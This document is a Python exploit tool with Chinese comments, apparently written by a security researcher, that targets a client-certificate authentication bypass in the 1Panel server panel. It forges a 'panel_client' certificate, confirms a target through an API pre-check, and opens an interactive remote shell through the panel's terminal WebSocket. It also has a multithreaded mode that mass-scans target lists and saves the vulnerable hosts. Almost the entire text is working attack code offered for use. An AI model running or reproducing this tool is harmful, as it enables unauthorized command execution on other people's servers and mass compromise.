import base64 import ssl import sys import json import os import tempfile import argparse import requests import websocket import threading from concurrent.futures import ThreadPoolExecutor, as_completed from urllib.parse import urlparse from cryptography import x509 from cryptography.x509.oid import NameOID from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.primitives import serialization import datetime # 禁用 requests 库在禁用SSL验证时产生的警告 from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # --- 全局变量和线程锁 --- print_lock = threading.Lock() exploit_running = True vulnerable_hosts = [] # --- 核心功能函数 --- def generate_self_signed_cert(): """动态生成CN为'panel_client'的证书和私钥,并返回临时文件路径。""" with print_lock: print("[*] 正在动态生成伪造的客户端证书...") try: private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048) subject = issuer = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"panel_client")]) cert_builder = x509.CertificateBuilder().subject_name(subject).issuer_name(issuer).public_key( private_key.public_key() ).serial_number(x509.random_serial_number()).not_valid_before( datetime.datetime.utcnow() ).not_valid_after( datetime.datetime.utcnow() + datetime.timedelta(days=365) ) cert = cert_builder.sign(private_key, hashes.SHA256()) key_file = tempfile.NamedTemporaryFile(delete=False, mode='wb', suffix=".key") key_file.write(private_key.private_bytes( encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.PKCS8, encryption_algorithm=serialization.NoEncryption(), )) key_file.close() cert_file = tempfile.NamedTemporaryFile(delete=False, mode='wb', suffix=".crt") cert_file.write(cert.public_bytes(serialization.Encoding.PEM)) cert_file.close() with print_lock: print(f"[+] 证书已生成: {cert_file.name}, {key_file.name}") return cert_file.name, key_file.name except Exception as e: with print_lock: print(f"[ERROR] 生成证书时发生错误: {e}") return None, None def check_target(target_host, cert_path, key_path, proxy_dict, proxy_opts): """对单个目标执行完整的两步检测流程。返回 (target_host, bool, str)""" # 步骤一:HTTP 预检 check_url = f"https://{target_host}/api/v2/dashboard/base/os" headers = { 'User-Agent': '1panel_client', 'Origin':f"https://{target_host}/", 'Content-Type': 'application/ison' } try: response = requests.get( check_url, cert=(cert_path, key_path), proxies=proxy_dict, verify=False, timeout=10, headers=headers ) if response.status_code != 200: return target_host, False, f"预检失败 (HTTP {response.status_code})" with print_lock: print(f"[*] {target_host:<21} - HTTP 预检成功 (200 OK)") except requests.exceptions.RequestException as e: return target_host, False, f"预检请求失败 ({type(e).__name__})" # 步骤二:WebSocket 连接尝试 ws_url = f"wss://{target_host}/api/v2/hosts/terminal" try: ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) ssl_context.load_cert_chain(cert_path, key_path) ssl_context.check_hostname = False ssl_context.verify_mode = ssl.CERT_NONE ws = websocket.create_connection(ws_url, sslopt={"context": ssl_context}, timeout=10, **proxy_opts) ws.close() return target_host, True, "存在漏洞 (HTTP预检和WSS连接均成功)" except Exception as e: return target_host, False, f"WSS连接失败 ({type(e).__name__})" def receive_thread(ws): """交互式Shell的接收线程。""" global exploit_running while exploit_running: try: raw_message = ws.recv() if not raw_message: continue response_json = json.loads(raw_message) if isinstance(response_json, dict) and "data" in response_json and response_json["data"]: decoded_bytes = base64.b64decode(response_json["data"]) output_str = decoded_bytes.decode('utf-8', errors='ignore') sys.stdout.write(output_str) sys.stdout.flush() except (websocket.WebSocketConnectionClosedException, ConnectionResetError): if exploit_running: print("\n[*] 连接意外关闭。"); exploit_running = False break except Exception: pass def run_exploit_mode(target, cert_path, key_path, proxy_opts): """执行单目标利用。""" global exploit_running print("[*] 正在尝试获取交互式 Shell...") ws_url = f"wss://{target}/api/v2/hosts/terminal" try: ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) ssl_context.load_cert_chain(cert_path, key_path) ssl_context.check_hostname = False ssl_context.verify_mode = ssl.CERT_NONE ws = websocket.create_connection(ws_url, sslopt={"context": ssl_context}, **proxy_opts) print("[+] Shell 获取成功!") print("[*] 输入 'exit' 或按下 Ctrl+C 退出。") print("---") recv_th = threading.Thread(target=receive_thread, args=(ws,)) recv_th.daemon = True recv_th.start() while exploit_running: try: cmd = input() if cmd.strip().lower() == 'exit': break b64_cmd = base64.b64encode((cmd + '\n').encode('utf-8')).decode('utf-8') ws.send(json.dumps({"type": "cmd", "data": b64_cmd})) except EOFError: break exploit_running = False ws.close() except KeyboardInterrupt: print("\n[*] 用户中断,正在关闭 Shell...") except Exception as e: print(f"\n[-] 获取 Shell 时发生错误: {e}") finally: exploit_running = False def run_scan_mode(targets, cert_path, key_path, proxy_dict, proxy_opts, threads, output_file): """执行批量扫描。""" print(f"[*] 开始对 {len(targets)} 个目标进行检测,使用 {threads} 个线程...") with ThreadPoolExecutor(max_workers=threads) as executor: future_to_target = {executor.submit(check_target, t, cert_path, key_path, proxy_dict, proxy_opts): t for t in targets} for future in as_completed(future_to_target): target, is_vulnerable, message = future.result() with print_lock: if is_vulnerable: print(f"[+] {target:<21} - {message}") vulnerable_hosts.append(target) else: print(f"[-] {target:<21} - {message}") if vulnerable_hosts: print(f"\n[*] 检测完成!发现 {len(vulnerable_hosts)} 个存在漏洞的目标。") with open(output_file, 'w') as f: for host in vulnerable_hosts: f.write(host + '\n') print(f"[+] 结果已保存到文件: {output_file}") else: print("\n[*] 检测完成,未发现存在漏洞的目标。") def main(): parser = argparse.ArgumentParser(description="1Panel 客户端证书绕过RCE漏洞 一体化工具 (扫描+利用)\n作者: Mrxn https://github.com/Mr-xn", formatter_class=argparse.RawTextHelpFormatter) mode = parser.add_mutually_exclusive_group(required=True) mode.add_argument("-u", "--url", help="单个目标,进入利用模式。例如: 192.168.1.100:8080") mode.add_argument("-f", "--file", help="目标文件,进入批量扫描模式。") parser.add_argument("-o", "--output", default="vulnerable_targets.txt", help="[扫描模式] 保存漏洞结果的文件名。") parser.add_argument("-t", "--threads", type=int, default=20, help="[扫描模式] 并发线程数。") parser.add_argument("--proxy", help="为所有请求设置代理。例如: http://127.0.0.1:8080") args = parser.parse_args() cert_path, key_path = generate_self_signed_cert() if not cert_path: sys.exit(1) proxy_dict = {"http": args.proxy, "https": args.proxy} if args.proxy else {} proxy_opts = {} if args.proxy: print(f"[*] 所有请求将通过代理: {args.proxy}") p = urlparse(args.proxy) proxy_opts = {"proxy_type": p.scheme, "http_proxy_host": p.hostname, "http_proxy_port": p.port, "http_proxy_auth": (p.username, p.password) if p.username else None} try: if args.url: # --- 利用模式 --- print(f"---[ 进入单点利用模式: {args.url} ]---") target, is_vulnerable, message = check_target(args.url, cert_path, key_path, proxy_dict, proxy_opts) if is_vulnerable: print(f"[+] 目标 {args.url} 确认存在漏洞!") run_exploit_mode(args.url, cert_path, key_path, proxy_opts) else: print(f"[-] 目标 {args.url} 不存在漏洞或无法访问: {message}") elif args.file: # --- 扫描模式 --- print(f"---[ 进入批量扫描模式: {args.file} ]---") if not os.path.exists(args.file): print(f"[ERROR] 目标文件不存在: {args.file}"); return with open(args.file, 'r') as f: targets = [line.strip() for line in f if line.strip()] if not targets: print("[ERROR] 目标文件为空。"); return run_scan_mode(targets, cert_path, key_path, proxy_dict, proxy_opts, args.threads, args.output) except KeyboardInterrupt: print("\n[*] 用户中断,正在退出...") finally: if cert_path and os.path.exists(cert_path): os.remove(cert_path) if key_path and os.path.exists(key_path): os.remove(key_path) print("[*] 临时证书已清理,程序退出。") if __name__ == "__main__": main()